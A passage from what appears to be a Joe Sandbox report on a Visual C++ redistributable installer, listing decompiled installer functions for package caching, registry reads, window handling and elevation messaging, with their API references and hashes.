                                                                          • Failed to recreate command-line for update bundle., xrefs: 0002F79C
                                                                          • Failed to default local update source, xrefs: 0002F742
                                                                          • update\%ls, xrefs: 0002F72E
                                                                          • Failed to set update bundle., xrefs: 0002F7F3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
                                                                          • API String ID: 3168844106-1266646976
                                                                          • Opcode ID: b91a1701a22ceb440421fa53fbcc516ee10f1cc17c0f68a7819e7521f57c616a
                                                                          • Instruction ID: 3427fd82d300035d7ee0da6564e952b29256f83529cef1db3c654052c7924cde
                                                                          • Opcode Fuzzy Hash: b91a1701a22ceb440421fa53fbcc516ee10f1cc17c0f68a7819e7521f57c616a
                                                                          • Instruction Fuzzy Hash: 7741AC3190422AEFDF219F94EC46EBAB7B9EF04390F014279F908A7161D771AC508B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00028AA3 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 122sleepCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 51%
                                                                          			E00028AA3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				signed int _t50;
				void* _t57;
				void* _t62;
				void* _t63;

				_t57 = __edx;
				_t52 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t59 = _a8;
				_t24 = E0002A189(__ecx, _a8, _a16,  &_v12);
				_t50 = _v12;
				_t62 = _t24;
				if(_t62 >= 0) {
					_push(_t50);
					E0001550F(2, (0 | _a4 != 0x00000000) + 0x2000015f, _a12);
					_t29 = 0x80004005;
					_t63 = 0;
					while(_t63 < 3) {
						if(_t63 != 0) {
							Sleep(0x7d0);
						}
						_t29 = E00013BC3(_t57, _t50, 7);
						if(_t29 != 0x80070003) {
							_t63 = _t63 + 1;
							if(_t29 < 0) {
								continue;
							}
						}
						break;
					}
					if(_t29 >= 0) {
						_t62 = E0002886A(_t52, _t59, 1,  &_v8);
						if(_t62 >= 0) {
							E00013BC3(_t57, _v8, 4);
							if(_t62 == 1) {
								_t62 = E0002886A(_t52, _t59, 0,  &_v8);
								if(_t62 >= 0) {
									E00013BC3(_t57, _v8, 4);
								} else {
									_t40 =  ==  ? "per-user" : "per-machine";
									_push( ==  ? "per-user" : "per-machine");
									_push("Failed to get old %hs package cache root directory.");
									goto L12;
								}
							}
						} else {
							_t43 =  ==  ? "per-user" : "per-machine";
							_push( ==  ? "per-user" : "per-machine");
							_push("Failed to get %hs package cache root directory.");
							L12:
							_push(_t62);
							E0005012F();
						}
					} else {
						_push(_t29);
						_push(_t50);
						E0001550F(2, (0 | _a4 != 0x00000000) + 0xa0000161, _a12);
						_t62 = 0;
					}
				} else {
					_push("Failed to calculate cache path.");
					_push(_t62);
					E0005012F();
				}
				if(_t50 != 0) {
					E000554EF(_t50);
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				return _t62;
			}











                                                                          0x00028aa3
                                                                          0x00028aa3
                                                                          0x00028aa6
                                                                          0x00028aa7
                                                                          0x00028aa8
                                                                          0x00028aaf
                                                                          0x00028ab6
                                                                          0x00028abe
                                                                          0x00028ac3
                                                                          0x00028ac6
                                                                          0x00028aca
                                                                          0x00028ae3
                                                                          0x00028af2
                                                                          0x00028afa
                                                                          0x00028aff
                                                                          0x00028b01
                                                                          0x00028b08
                                                                          0x00028b0f
                                                                          0x00028b0f
                                                                          0x00028b18
                                                                          0x00028b22
                                                                          0x00028b24
                                                                          0x00028b27
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00028b27
                                                                          0x00000000
                                                                          0x00028b22
                                                                          0x00028b2b
                                                                          0x00028b5a
                                                                          0x00028b5e
                                                                          0x00028b85
                                                                          0x00028b8d
                                                                          0x00028b9b
                                                                          0x00028b9f
                                                                          0x00028bbd
                                                                          0x00028ba1
                                                                          0x00028bad
                                                                          0x00028bb0
                                                                          0x00028bb1
                                                                          0x00000000
                                                                          0x00028bb1
                                                                          0x00028b9f
                                                                          0x00028b60
                                                                          0x00028b6c
                                                                          0x00028b6f
                                                                          0x00028b70
                                                                          0x00028b75
                                                                          0x00028b75
                                                                          0x00028b76
                                                                          0x00028b7b
                                                                          0x00028b2d
                                                                          0x00028b2d
                                                                          0x00028b33
                                                                          0x00028b42
                                                                          0x00028b4a
                                                                          0x00028b4a
                                                                          0x00028acc
                                                                          0x00028acc
                                                                          0x00028ad1
                                                                          0x00028ad2
                                                                          0x00028ad8
                                                                          0x00028bc4
                                                                          0x00028bc7
                                                                          0x00028bc7
                                                                          0x00028bd0
                                                                          0x00028bd5
                                                                          0x00028bd5
                                                                          0x00028be2

                                                                          APIs
                                                                          • Sleep.KERNEL32(000007D0,00000000,00000000), ref: 00028B0F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
                                                                          • API String ID: 3472027048-398165853
                                                                          • Opcode ID: bc17d000b0480436d0789c096c371ee95944d9ba91bee7e3097960e3654192a0
                                                                          • Instruction ID: 12253491e09face7b08da871fe16d7d81ff27fce6d4dbd571bfc431e918a8524
                                                                          • Opcode Fuzzy Hash: bc17d000b0480436d0789c096c371ee95944d9ba91bee7e3097960e3654192a0
                                                                          • Instruction Fuzzy Hash: 3931E6B6A02239BBEB12AA549C47FBFB65DDF00711F004029FE05EA242DF758E405791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000121BC Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 117COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 33%
                                                                          			E000121BC(signed int __edx, intOrPtr* _a4, char* _a8, signed int _a12, int _a16) {
				signed int _t17;
				unsigned int _t18;
				signed int _t19;
				signed short _t24;
				intOrPtr _t25;
				signed short _t31;
				signed int _t34;
				int _t36;
				char* _t38;
				void* _t39;
				intOrPtr _t41;
				intOrPtr _t42;
				int _t44;
				unsigned int _t46;
				intOrPtr* _t47;
				unsigned int _t49;
				int _t51;

				_t37 = _a4;
				_t44 = __edx | 0xffffffff;
				_t17 = _a12;
				_t51 = 0;
				_t34 = _t17;
				_t46 = 0;
				if( *_a4 == 0) {
					L4:
					_t38 = _a8;
					if(_t17 != 0) {
						if(_t38[_t17] == 0) {
							_t34 = _t17 - 1;
						}
						L11:
						_t18 = _t34 + 1;
						if(_t46 >= _t18) {
							L20:
							_t19 = _a12;
							_push(_t46);
							_t47 = _a4;
							_push( *_t47);
							_t39 = 0xffffffff;
							_t20 =  ==  ? _t39 : _t19;
							if(MultiByteToWideChar(_a16, _t51, _a8,  ==  ? _t39 : _t19, ??, ??) != 0) {
								 *((short*)( *_t47 + _t34 * 2)) = 0;
								L23:
								return _t51;
							}
							_t24 = GetLastError();
							_t55 =  <=  ? _t24 : _t24 & 0x0000ffff | 0x80070000;
							_t25 = 0x80004005;
							_t51 =  >=  ? 0x80004005 :  <=  ? _t24 : _t24 & 0x0000ffff | 0x80070000;
							_push(_t51);
							_push(0x22f);
							L7:
							_push("strutil.cpp");
							E000137D3(_t25);
							goto L23;
						}
						_t46 = _t18;
						if(_t46 < 0x7fffffff) {
							_push(1);
							_t41 =  *_a4;
							_push(_t46 + _t46);
							if(_t41 == 0) {
								_t25 = E000138D4();
							} else {
								_push(_t41);
								_t25 = E00013A72();
							}
							_t42 = _t25;
							if(_t42 != 0) {
								 *_a4 = _t42;
								goto L20;
							} else {
								_t51 = 0x8007000e;
								_push(0x8007000e);
								_push(0x228);
								goto L7;
							}
						}
						_t51 = 0x8007000e;
						goto L23;
					}
					_t36 = MultiByteToWideChar(_a16, _t51, _t38, _t44, _t51, _t51);
					if(_t36 != 0) {
						_t34 = _t36 - 1;
						goto L11;
					}
					_t31 = GetLastError();
					_t58 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
					_t25 = 0x80004005;
					_t51 =  >=  ? 0x80004005 :  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
					_push(_t51);
					_push(0x20c);
					goto L7;
				}
				_t49 = E00013B51( *_t37);
				_t44 = _t44 | 0xffffffff;
				if(_t49 != _t44) {
					_t46 = _t49 >> 1;
					_t17 = _t34;
					goto L4;
				}
				_t51 = 0x80070057;
				goto L23;
			}




















                                                                          0x000121bf
                                                                          0x000121c2
                                                                          0x000121c5
                                                                          0x000121ca
                                                                          0x000121cc
                                                                          0x000121cf
                                                                          0x000121d3
                                                                          0x000121f3
                                                                          0x000121f3
                                                                          0x000121f8
                                                                          0x00012248
                                                                          0x0001224a
                                                                          0x0001224a
                                                                          0x0001224d
                                                                          0x0001224d
                                                                          0x00012252
                                                                          0x0001229c
                                                                          0x0001229c
                                                                          0x000122a1
                                                                          0x000122a2
                                                                          0x000122a5
                                                                          0x000122a9
                                                                          0x000122aa
                                                                          0x000122bd
                                                                          0x000122ec
                                                                          0x000122f0
                                                                          0x000122f6
                                                                          0x000122f6
                                                                          0x000122bf
                                                                          0x000122d0
                                                                          0x000122d3
                                                                          0x000122da
                                                                          0x000122dd
                                                                          0x000122de
                                                                          0x00012232
                                                                          0x00012232
                                                                          0x00012237
                                                                          0x00000000
                                                                          0x00012237
                                                                          0x00012254
                                                                          0x0001225c
                                                                          0x0001226b
                                                                          0x0001226d
                                                                          0x00012272
                                                                          0x00012275
                                                                          0x0001227f
                                                                          0x00012277
                                                                          0x00012277
                                                                          0x00012278
                                                                          0x00012278
                                                                          0x00012284
                                                                          0x00012288
                                                                          0x0001229a
                                                                          0x00000000
                                                                          0x0001228a
                                                                          0x0001228a
                                                                          0x0001228f
                                                                          0x00012290
                                                                          0x00000000
                                                                          0x00012290
                                                                          0x00012288
                                                                          0x0001225e
                                                                          0x00000000
                                                                          0x0001225e
                                                                          0x00012208
                                                                          0x0001220c
                                                                          0x00012241
                                                                          0x00000000
                                                                          0x00012241
                                                                          0x0001220e
                                                                          0x0001221f
                                                                          0x00012222
                                                                          0x00012229
                                                                          0x0001222c
                                                                          0x0001222d
                                                                          0x00000000
                                                                          0x0001222d
                                                                          0x000121dc
                                                                          0x000121de
                                                                          0x000121e3
                                                                          0x000121ef
                                                                          0x000121f1
                                                                          0x00000000
                                                                          0x000121f1
                                                                          0x000121e5
                                                                          0x00000000

                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00012202
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 0001220E
                                                                            • Part of subcall function 00013B51: GetProcessHeap.KERNEL32(00000000,000001C7,?,000121DC,000001C7,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00013B59
                                                                            • Part of subcall function 00013B51: HeapSize.KERNEL32(00000000,?,000121DC,000001C7,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00013B60
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                          • String ID: @Met$strutil.cpp
                                                                          • API String ID: 3662877508-569070560
                                                                          • Opcode ID: 445c6535fab9ef9c3cfa2c1752fd1fd109167f4dc142bd7405c3d3277f69ed5a
                                                                          • Instruction ID: 845d747c1e6f5042c6ce817e3234d00bae538778ab1af87e00e807047c9ea355
                                                                          • Opcode Fuzzy Hash: 445c6535fab9ef9c3cfa2c1752fd1fd109167f4dc142bd7405c3d3277f69ed5a
                                                                          • Instruction Fuzzy Hash: E231D832700216BBEB249AA9CC44AEF77D9EF45764B114229FD15DB2E0EB35DC90C7A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002E705 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 91%
                                                                          			E0002E705(struct HWND__* _a4, int _a8, int _a12, signed int _a16) {
				int _t22;
				void* _t24;
				long _t25;
				void* _t34;
				long _t38;
				void* _t42;
				void* _t45;
				intOrPtr* _t47;
				signed int _t50;
				long _t53;

				_t22 = _a8;
				if(_t22 == 0) {
					PostQuitMessage(0);
					return 0;
				}
				_t24 = _t22 - 0xf;
				if(_t24 == 0) {
					_t42 = 0;
					_t50 = _a16 & 0x40000000;
					_t25 = GetWindowLongW(_a4, 0xffffffeb);
					_a4 = _t25;
					if( *_t25 == 0) {
						_t47 =  *((intOrPtr*)( *((intOrPtr*)(_t25 + 4)) + 0x10));
						_t45 = 2;
						_t46 =  !=  ? 0 : _t45;
						 *((intOrPtr*)( *_t47 + 0x14))(_t47, _a16,  !=  ? 0 : _t45);
						_t42 = 0xbadbad;
					}
					_push(E00023C30(_t42));
					_push(E00023C30(_a4->i));
					E0001550F(2, 0x20000190, E00023C30(_t50));
					return _t42;
				}
				_t53 = _a16;
				_t34 = _t24 - 0x70;
				if(_t34 == 0) {
					SetWindowLongW(_a4, 0xffffffeb,  *_t53);
					L6:
					return DefWindowProcW(_a4, _a8, _a12, _t53);
				}
				if(_t34 != 1) {
					goto L6;
				}
				_t38 = DefWindowProcW(_a4, 0x82, _a12, _t53);
				SetWindowLongW(_a4, 0xffffffeb, 0);
				return _t38;
			}













                                                                          0x0002e70d
                                                                          0x0002e710
                                                                          0x0002e7de
                                                                          0x00000000
                                                                          0x0002e7e4
                                                                          0x0002e716
                                                                          0x0002e719
                                                                          0x0002e774
                                                                          0x0002e77b
                                                                          0x0002e781
                                                                          0x0002e787
                                                                          0x0002e78c
                                                                          0x0002e797
                                                                          0x0002e79a
                                                                          0x0002e79b
                                                                          0x0002e7a5
                                                                          0x0002e7ab
                                                                          0x0002e7ab
                                                                          0x0002e7b4
                                                                          0x0002e7bf
                                                                          0x0002e7ce
                                                                          0x00000000
                                                                          0x0002e7d9
                                                                          0x0002e71b
                                                                          0x0002e71e
                                                                          0x0002e721
                                                                          0x0002e757
                                                                          0x0002e75d
                                                                          0x00000000
                                                                          0x0002e767
                                                                          0x0002e726
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002e734
                                                                          0x0002e743
                                                                          0x00000000

                                                                          APIs
                                                                          • DefWindowProcW.USER32(?,00000082,?,?), ref: 0002E734
                                                                          • SetWindowLongW.USER32 ref: 0002E743
                                                                          • SetWindowLongW.USER32 ref: 0002E757
                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 0002E767
                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0002E781
                                                                          • PostQuitMessage.USER32(00000000), ref: 0002E7DE
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$Proc$MessagePostQuit
                                                                          • String ID:
                                                                          • API String ID: 3812958022-0
                                                                          • Opcode ID: 8b269111d3fff172e37ee2a555bf6d910aec2fe5eb30aa02656549d02b4995a7
                                                                          • Instruction ID: 0cb61aecaa5cc3d15ab2ee7a3c5fd02547ad9e04a3b3bb4a28a789673a9e8dae
                                                                          • Opcode Fuzzy Hash: 8b269111d3fff172e37ee2a555bf6d910aec2fe5eb30aa02656549d02b4995a7
                                                                          • Instruction Fuzzy Hash: 0521A132148228BFEB115FA4EC48EAF3BA9EF45351F148564F906AA1B1C735ED10DB60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002C59C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 163synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 90%
                                                                          			E0002C59C(void* __ecx, void* __edx, intOrPtr* _a4, signed int _a8, intOrPtr* _a12) {
				signed int _t87;
				void* _t96;

				_t97 = _a4;
				_t96 = 0;
				_t87 =  *_a4 - 1;
				if(_t87 > 0x13) {
					L23:
					_t96 = 0x80070057;
					E000137D3(_t87, "elevation.cpp", 0x5e4, 0x80070057);
					E0005012F(0x80070057, "Unexpected elevated message sent to child process, msg: %u",  *_t97);
					L24:
					return _t96;
				}
				switch( *((intOrPtr*)(_t87 * 4 +  &M0002C7AC))) {
					case 0:
						_t92 = E0002AEB2(__ecx, __edx, _t101,  *((intOrPtr*)(_a8 + 0x20)),  *((intOrPtr*)(_a8 + 0x24)),  *((intOrPtr*)(_t91 + 8)),  *((intOrPtr*)(_t91 + 0xc)),  *((intOrPtr*)(_t97 + 0xc)),  *((intOrPtr*)(_t97 + 4)));
						goto L21;
					case 1:
						__eax = _a8;
						__esi =  *(_a8 + 8);
						__eflags =  *__esi;
						if( *__esi != 0) {
							ReleaseMutex( *__esi) = CloseHandle( *__esi);
							 *__esi = 0;
						}
						__esi = __edi;
						goto L22;
					case 2:
						_a8 = E0002C29D(__ecx, __edx, __eflags,  *((intOrPtr*)(_a8 + 0x24)),  *((intOrPtr*)(__eax + 0x20)),  *((intOrPtr*)(__eax + 0x28)), __esi[3], __esi[1]);
						goto L21;
					case 3:
						_a8 = E0002C484(__ecx, __edx, __eflags,  *((intOrPtr*)(_a8 + 0x24)), __esi[3], __esi[1]);
						goto L21;
					case 4:
						_a8 = E0002C3DF(__ecx, __edx, __eflags,  *((intOrPtr*)(_a8 + 0x24)),  *((intOrPtr*)(__eax + 0x20)), __esi[3], __esi[1]);
						goto L21;
					case 5:
						__eax = _a8;
						__esi = E0001FDDF(__ecx,  *((intOrPtr*)(_a8 + 0x24)), __esi[3], __esi[1]);
						__eflags = __esi;
						if(__esi < 0) {
							_push("Failed to save state.");
							_push(__esi);
							__eax = E0005012F();
							_pop(__ecx);
							_pop(__ecx);
						}
						goto L22;
					case 6:
						goto L23;
					case 7:
						_a8 = E0002C1D8(__ecx, __edx, __eflags,  *((intOrPtr*)(_a8 + 0x24)), __esi[3], __esi[1]);
						goto L21;
					case 8:
						__ecx = _a8;
						 *((intOrPtr*)(__ecx + 0x24)) =  *((intOrPtr*)(__ecx + 0x24)) + 0xb4;
						__eax = L0002B35A(__ecx, __edx, __eflags,  *((intOrPtr*)(__ecx + 4)),  *((intOrPtr*)(__ecx + 0x18)),  *((intOrPtr*)(__ecx + 0x24)) + 0xb4,  *((intOrPtr*)(__ecx + 0x20)), __esi[3], __esi[1]);
						goto L21;
					case 9:
						_a8 = E0002B561(__ecx, __eflags,  *((intOrPtr*)(_a8 + 4)),  *((intOrPtr*)(__eax + 0x18)),  *((intOrPtr*)(__eax + 0x20)), __esi[3], __esi[1]);
						goto L21;
					case 0xa:
						_a8 = E0002B813(__ecx, __eflags,  *((intOrPtr*)(_a8 + 4)),  *((intOrPtr*)(__eax + 0x18)),  *((intOrPtr*)(__eax + 0x20)), __esi[3], __esi[1]);
						goto L21;
					case 0xb:
						_a8 = E0002BAB9(__ecx, __eflags,  *((intOrPtr*)(_a8 + 4)),  *((intOrPtr*)(__eax + 0x18)),  *((intOrPtr*)(__eax + 0x20)), __esi[3], __esi[1]);
						goto L21;
					case 0xc:
						__ecx = _a8;
						 *((intOrPtr*)(__ecx + 0x24)) =  *((intOrPtr*)(__ecx + 0x24)) + 0xb4;
						__eax = E0002BD23(__ecx, __edi, __eflags,  *((intOrPtr*)(__ecx + 0x18)),  *((intOrPtr*)(__ecx + 0x24)) + 0xb4, __esi[3], __esi[1]);
						goto L21;
					case 0xd:
						__ecx = _a8;
						 *((intOrPtr*)(__ecx + 0x24)) =  *((intOrPtr*)(__ecx + 0x24)) + 0xb4;
						__eax = E0002BC1C(__ecx, __edx, __edi, __eflags,  *((intOrPtr*)(__ecx + 0x18)),  *((intOrPtr*)(__ecx + 0x24)) + 0xb4, __esi[3], __esi[1]);
						goto L21;
					case 0xe:
						_a8 = E0002C0B1(__ecx, __eflags,  *((intOrPtr*)(_a8 + 0x18)), __esi[3], __esi[1]);
						goto L21;
					case 0xf:
						_a8 = E0002B2C2(__ecx, __edx, __eflags,  *((intOrPtr*)(_a8 + 0x18)), __esi[3], __esi[1]);
						goto L21;
					case 0x10:
						_a8 = E0002BE05(__ecx, __eflags,  *((intOrPtr*)(_a8 + 4)),  *((intOrPtr*)(__eax + 0x10)),  *((intOrPtr*)(__eax + 0x20)), __esi[3], __esi[1]);
						L21:
						_t98 = _t92;
						L22:
						 *_a12 = _t98;
						goto L24;
				}
			}





                                                                          0x0002c5a0
                                                                          0x0002c5a4
                                                                          0x0002c5a8
                                                                          0x0002c5ac
                                                                          0x0002c77d
                                                                          0x0002c77d
                                                                          0x0002c78d
                                                                          0x0002c79a
                                                                          0x0002c7a2
                                                                          0x0002c7a7
                                                                          0x0002c7a7
                                                                          0x0002c5b2
                                                                          0x00000000
                                                                          0x0002c5ce
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002c5d8
                                                                          0x0002c5db
                                                                          0x0002c5de
                                                                          0x0002c5e0
                                                                          0x0002c5ec
                                                                          0x0002c5f2
                                                                          0x0002c5f2
                                                                          0x0002c5f4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002c60d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002c623
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002c63c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002c649
                                                                          0x0002c657
                                                                          0x0002c659
                                                                          0x0002c65b
                                                                          0x0002c661
                                                                          0x0002c666
                                                                          0x0002c667
                                                                          0x0002c66c
                                                                          0x0002c66d
                                                                          0x0002c66d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002c67f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002c68c
                                                                          0x0002c698
                                                                          0x0002c6a4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002c6c0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002c6dc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002c6f8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002c6ff
                                                                          0x0002c70b
                                                                          0x0002c714
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002c71b
                                                                          0x0002c727
                                                                          0x0002c730
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002c743
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002c756
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002c76f
                                                                          0x0002c774
                                                                          0x0002c774
                                                                          0x0002c776
                                                                          0x0002c779
                                                                          0x00000000
                                                                          0x00000000

                                                                          APIs
                                                                          Strings
                                                                          • Failed to save state., xrefs: 0002C661
                                                                          • Unexpected elevated message sent to child process, msg: %u, xrefs: 0002C794
                                                                          • elevation.cpp, xrefs: 0002C788
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleMutexRelease
                                                                          • String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
                                                                          • API String ID: 4207627910-1576875097
                                                                          • Opcode ID: 27663ff9cc8b0faf5a00da02c28ea8b8604401084af0c02864a586102b3cd703
                                                                          • Instruction ID: 031d2aa67adc2661cfb77be4643a27128c5bd924b2c4e70432c3b08a4ae40e9b
                                                                          • Opcode Fuzzy Hash: 27663ff9cc8b0faf5a00da02c28ea8b8604401084af0c02864a586102b3cd703
                                                                          • Instruction Fuzzy Hash: 3F61F53A104624FFDB229F94DD41C5ABBB2FF09314711C558FAAA5A632C732E921EF41
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000510C5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 149registrystringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 91%
                                                                          			E000510C5(void* _a4, short* _a8, signed int* _a12, signed int* _a16) {
				int* _v8;
				int _v12;
				int _v16;
				signed short _t44;
				void* _t47;
				int* _t51;
				long _t71;
				signed int _t72;
				signed int _t73;
				signed short _t75;
				unsigned int _t79;
				unsigned int _t80;
				unsigned int _t81;
				WCHAR* _t82;
				void* _t86;
				void* _t87;
				void* _t88;

				_v16 = 0;
				_t72 = 0;
				_v12 = 0;
				_t81 = 0;
				_v8 = 0;
				_t44 = RegQueryValueExW(_a4, _a8, 0,  &_v16, 0,  &_v12);
				_t79 = _v12;
				_t75 = _t44;
				if(_t79 == 0) {
					L3:
					_t86 = 0x80070002;
					_t47 =  <=  ? _t75 : _t75 & 0x0000ffff | 0x80070000;
					if(_t47 != 0x80070002) {
						if(_t75 == 0) {
							_t80 = _t79 >> 1;
							if(_t80 == _t81) {
								if(_v16 == 7) {
									if(_t81 >= 2) {
										_t51 = _v8;
										if(0 !=  *((intOrPtr*)(_t51 + _t81 * 2 - 2)) || 0 !=  *((intOrPtr*)(_t51 + _t81 * 2 - 4))) {
											_t86 = 0x80070057;
										} else {
											_t87 = 0;
											if(_t80 != 0) {
												do {
													_t87 = _t87 + 1;
													_t29 = _t72 + 1; // 0x1
													_t63 =  !=  ? _t72 : _t29;
													_t72 =  !=  ? _t72 : _t29;
												} while (_t87 < _t80);
											}
											_t31 = _t72 - 1; // 0x0
											_t52 = _t31;
											 *_a16 = _t31;
											_t86 = E000138F6(_t31, _a16, _a12, _t52, 4, 0);
											if(_t86 >= 0) {
												_t73 = 0;
												_t82 = _v8;
												if( *_a16 > 0) {
													while(1) {
														_t86 = E000121A5( *_a12 + _t73 * 4, _t82, 0);
														if(_t86 < 0) {
															goto L23;
														}
														_t82 =  &(( &(_t82[lstrlenW(_t82)]))[1]);
														_t73 = _t73 + 1;
														if(_t73 <  *_a16) {
															continue;
														} else {
														}
														goto L23;
													}
												}
											}
										}
									} else {
										 *_a12 =  *_a12 & _t72;
										 *_a16 =  *_a16 & _t72;
										_t86 = 0;
									}
								} else {
									_t86 = 0x8007070c;
									_push(0x8007070c);
									_push(0x225);
									goto L6;
								}
							} else {
								_t86 = 0x8000ffff;
							}
						} else {
							_t88 = _t47;
							_t47 = 0x80004005;
							_t86 =  >=  ? 0x80004005 : _t88;
							_push(_t86);
							_push(0x21a);
							L6:
							_push("regutil.cpp");
							E000137D3(_t47);
						}
					}
				} else {
